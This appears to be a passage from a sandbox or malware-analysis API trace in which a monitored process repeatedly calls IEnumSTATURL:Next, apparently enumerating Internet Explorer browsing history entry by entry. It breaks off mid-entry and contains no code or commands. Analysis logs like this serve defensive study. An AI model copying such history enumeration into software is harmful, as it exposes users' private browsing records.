[0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.196] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.197] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.197] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.197] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.197] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.204] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.204] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.204] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.204] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.204] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.204] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.204] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.205] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.206] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.207] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.207] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.208] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.209] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.210] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.210] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.210] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.210] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.210] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.210] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.210] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.211] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.212] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.213] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.213] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.213] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.213] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.215] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.215] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.215] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.215] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.215] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.215] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.215] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.216] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.217] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.217] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.217] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.217] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.217] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.217] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.217] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.218] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.218] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.218] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.218] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.218] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.218] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.218] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.220] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.221] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.222] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.223] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.223] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.223] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.224] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.225] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.226] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.226] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.226] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.226] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.226] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, pceltFetched=0xddb64*=0x1 | out: rgelt=0xddb1c, pceltFetched=0xddb64*=0x1) returned 0x0 [0169.226] IEnumSTATURL:Next (in: This=0x6da548, celt=0x1, rgelt=0xddb1c, 